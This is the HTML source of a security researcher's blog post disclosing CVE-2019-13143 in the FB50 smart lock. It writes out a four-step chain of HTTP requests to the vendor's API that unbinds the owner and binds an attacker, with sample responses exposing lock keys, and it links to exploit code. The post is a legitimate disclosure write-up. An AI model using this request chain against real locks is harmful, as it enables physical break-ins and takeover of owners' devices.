build/blog/fb50/index.html (view raw)
1<!DOCTYPE html>
2<html lang=en>
3<link rel="stylesheet" href="/static/style.css" type="text/css">
4<link rel="stylesheet" href="/static/syntax.css" type="text/css">
5<link rel="shortcut icon" type="images/x-icon" href="/static/favicon.ico">
6<meta name="description" content="… and lessons learnt in IoT security">
7<meta name="viewport" content="initial-scale=1">
8<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
9<meta content="#021012" name="theme-color">
10<meta name="HandheldFriendly" content="true">
11<meta name="twitter:card" content="summary_large_image">
12<meta name="twitter:site" content="@icyphox">
13<meta name="twitter:title" content="Picking the FB50 smart lock (CVE-2019-13143)">
14<meta name="twitter:description" content="… and lessons learnt in IoT security">
15<meta name="twitter:image" content="/static/icyphox.png">
16<meta property="og:title" content="Picking the FB50 smart lock (CVE-2019-13143)">
17<meta property="og:type" content="website">
18<meta property="og:description" content="… and lessons learnt in IoT security">
19<meta property="og:url" content="https://icyphox.sh">
20<meta property="og:image" content="/static/icyphox.png">
21<html>
22 <title>
23 Picking the FB50 smart lock (CVE-2019-13143)
24 </title>
25<script src="//instant.page/1.1.0" type="module" integrity="sha384-EwBObn5QAxP8f09iemwAJljc+sU+eUXeL9vSBw1eNmVarwhKk2F9vBEpaN9rsrtp"></script>
26<div class="container-text">
27 <header class="header">
28
29 <a href="/">home</a>
30 <a href="/blog">blog</a>
31 <a href="/reading">reading</a>
32 <a href="https://twitter.com/icyphox">twitter</a>
33 <a href="/about">about</a>
34
35 </header>
36<body>
37 <div class="content">
38 <div align="left">
39 <p> 2019-08-05 </p>
40 <h1 id="picking-the-fb50-smart-lock-cve-2019-13143">Picking the FB50 smart lock (CVE-2019-13143)</h1>
41
42<h2 id="and-lessons-learnt-in-iot-security">… and lessons learnt in IoT security</h2>
43
44<h3 id="the-lock">The lock</h3>
45
46<p>The lock in question is the FB50 smart lock, manufactured by Shenzhen
47Dragon Brother Technology Co. Ltd. This lock is sold under multiple brands
48across many ecommerce sites, and has over, an estimated, 15k+ users.</p>
49
50<p>The lock pairs to a phone via Bluetooth, and requires the OKLOK app from
51the Play/App Store to function. The app requires the user to create an
52account before further functionality is available.
53It also facilitates configuring the fingerprint,
54and unlocking from a range via Bluetooth.</p>
55
56<p>We had two primary attack surfaces we decided to tackle — Bluetooth (BLE)
57and the Android app.</p>
58
59<h3 id="via-bluetooth-low-energy-ble">Via Bluetooth Low Energy (BLE)</h3>
60
61<p>Android phones have the ability to capture Bluetooth (HCI) traffic
62which can be enabled under Developer Options under Settings. We made
63around 4 “unlocks” from the Android phone, as seen in the screenshot.</p>
64
65<p><img src="/static/img/bt_wireshark.png" alt="wireshark packets" /></p>
66
67<p>This is the value sent in the <code>Write</code> request:</p>
68
69<p><img src="/static/img/bt_ws_value.png" alt="wireshark write req" /></p>
70
71<p>We attempted replaying these requests using <code>gattool</code> and <code>gattacker</code>,
72but that didn’t pan out, since the value being written was encrypted.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>
73
74<h3 id="via-the-android-app">Via the Android app</h3>
75
76<p>Reversing the app using <code>jd-gui</code>, <code>apktool</code> and <code>dex2jar</code> didn’t get us too
77far since most of it was obfuscated. Why bother when there exists an
78easier approach – BurpSuite.</p>
79
80<p>We captured and played around with a bunch of requests and responses,
81and finally arrived at a working exploit chain.</p>
82
83<h3 id="the-exploit">The exploit</h3>
84
85<p>The entire exploit is a 4 step process consisting of authenticated
86HTTP requests:</p>
87
88<ol>
89<li>Using the lock’s MAC (obtained via a simple Bluetooth scan in the
90vicinity), get the barcode and lock ID</li>
91<li>Using the barcode, fetch the user ID</li>
92<li>Using the lock ID and user ID, unbind the user from the lock</li>
93<li>Provide a new name, attacker’s user ID and the MAC to bind the attacker
94to the lock</li>
95</ol>
96
97<p>This is what it looks like, in essence (personal info redacted).</p>
98
99<h4 id="request-1">Request 1</h4>
100
101<pre><code>POST /oklock/lock/queryDevice
102{"mac":"XX:XX:XX:XX:XX:XX"}
103</code></pre>
104
105<p>Response:</p>
106
107<pre><code>{
108 "result":{
109 "alarm":0,
110 "barcode":"<BARCODE>",
111 "chipType":"1",
112 "createAt":"2019-05-14 09:32:23.0",
113 "deviceId":"",
114 "electricity":"95",
115 "firmwareVersion":"2.3",
116 "gsmVersion":"",
117 "id":<LOCK ID>,
118 "isLock":0,
119 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
120 "lockPwd":"000000",
121 "mac":"XX:XX:XX:XX:XX:XX",
122 "name":"lock",
123 "radioName":"BlueFPL",
124 "type":0
125 },
126 "status":"2000"
127}
128</code></pre>
129
130<h4 id="request-2">Request 2</h4>
131
132<pre><code>POST /oklock/lock/getDeviceInfo
133
134{"barcode":"https://app.oklok.com.cn/app.html?id=<BARCODE>"}
135</code></pre>
136
137<p>Response:</p>
138
139<pre><code> "result":{
140 "account":"email@some.website",
141 "alarm":0,
142 "barcode":"<BARCODE>",
143 "chipType":"1",
144 "createAt":"2019-05-14 09:32:23.0",
145 "deviceId":"",
146 "electricity":"95",
147 "firmwareVersion":"2.3",
148 "gsmVersion":"",
149 "id":<LOCK ID>,
150 "isLock":0,
151 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
152 "lockPwd":"000000",
153 "mac":"XX:XX:XX:XX:XX:XX",
154 "name":"lock",
155 "radioName":"BlueFPL",
156 "type":0,
157 "userId":<USER ID>
158 }
159</code></pre>
160
161<h4 id="request-3">Request 3</h4>
162
163<pre><code>POST /oklock/lock/unbind
164
165{"lockId":"<LOCK ID>","userId":<USER ID>}
166</code></pre>
167
168<h4 id="request-4">Request 4</h4>
169
170<pre><code>POST /oklock/lock/bind
171
172{"name":"newname","userId":<USER ID>,"mac":"XX:XX:XX:XX:XX:XX"}
173</code></pre>
174
175<h3 id="thats-it-the-scary-stuff">That’s it! (& the scary stuff)</h3>
176
177<p>You should have the lock transferred to your account. The severity of this
178issue lies in the fact that the original owner completely loses access to
179their lock. They can’t even “rebind” to get it back, since the current owner
180(the attacker) needs to authorize that. </p>
181
182<p>To add to that, roughly 15,000 user accounts’ info are exposed via IDOR.
183Ilja, a cool dude I met on Telegram, noticed locks named “carlock”,
184“garage”, “MainDoor”, etc.<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup> This is terrifying.</p>
185
186<p><em>shudders</em></p>
187
188<h3 id="proof-of-concept">Proof of Concept</h3>
189
190<p><a href="https://twitter.com/icyphox/status/1158396372778807296">PoC Video</a></p>
191
192<p><a href="https://github.com/icyphox/pwnfb50">Exploit code</a></p>
193
194<h3 id="disclosure-timeline">Disclosure timeline</h3>
195
196<ul>
197<li><strong>26th June, 2019</strong>: Issue discovered at SecureLayer7, Pune</li>
198<li><strong>27th June, 2019</strong>: Vendor notified about the issue</li>
199<li><strong>2nd July, 2019</strong>: CVE-2019-13143 reserved</li>
200<li>No response from vendor</li>
201<li><strong>2nd August 2019</strong>: Public disclosure</li>
202</ul>
203
204<h3 id="lessons-learnt">Lessons learnt</h3>
205
206<p><strong>DO NOT</strong>. Ever. Buy. A smart lock. You’re better off with the “dumb” ones
207with keys. With the IoT plague spreading, it brings in a large attack surface
208to things that were otherwise “unhackable” (try hacking a “dumb” toaster).</p>
209
210<p>The IoT security scene is rife with bugs from over 10 years ago, like
211executable stack segments<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>, hardcoded keys, and poor development
212practices in general.</p>
213
214<p>Our existing threat models and scenarios have to be updated to factor
215in these new exploitation possibilities. This also broadens the playing
216field for cyber warfare and mass surveillance campaigns. </p>
217
218<h3 id="researcher-info">Researcher info</h3>
219
220<p>This research was done at <a href="https://securelayer7.net">SecureLayer7</a>, Pune, IN by:</p>
221
222<ul>
223<li>Anirudh Oppiliappan (me)</li>
224<li>S. Raghav Pillai (<a href="https://twitter.com/_vologue">@_vologue</a>)</li>
225<li>Shubham Chougule (<a href="https://twitter.com/shubhamtc">@shubhamtc</a>)</li>
226</ul>
227
228<div class="footnotes">
229<hr />
230<ol>
231<li id="fn-1">
232<p><a href="https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/">This</a> article discusses a similar smart lock, but they broke the encryption. <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
233</li>
234
235<li id="fn-2">
236<p>Thanks to Ilja Shaposhnikov (@drakylar). <a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
237</li>
238
239<li id="fn-3">
240<p><a href="https://gsec.hitb.org/materials/sg2015/whitepapers/Lyon%20Yang%20-%20Advanced%20SOHO%20Router%20Exploitation.pdf">PDF</a> <a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">↩</a></p>
241</li>
242</ol>
243</div>
244
245 </div>
246 <hr />
247 <p class="muted">Questions or comments? Open an issue at <a href="https://github.com/icyphox/site">this repo</a>, or send a plain-text email to <a href="mailto:icyph0x@pm.me">icyph0x@pm.me</a>.</p>
248 <footer>
249 <img src="https://licensebuttons.net/p/zero/1.0/80x15.png">
250 </footer>
251 </body>
252 </div>
253 </html>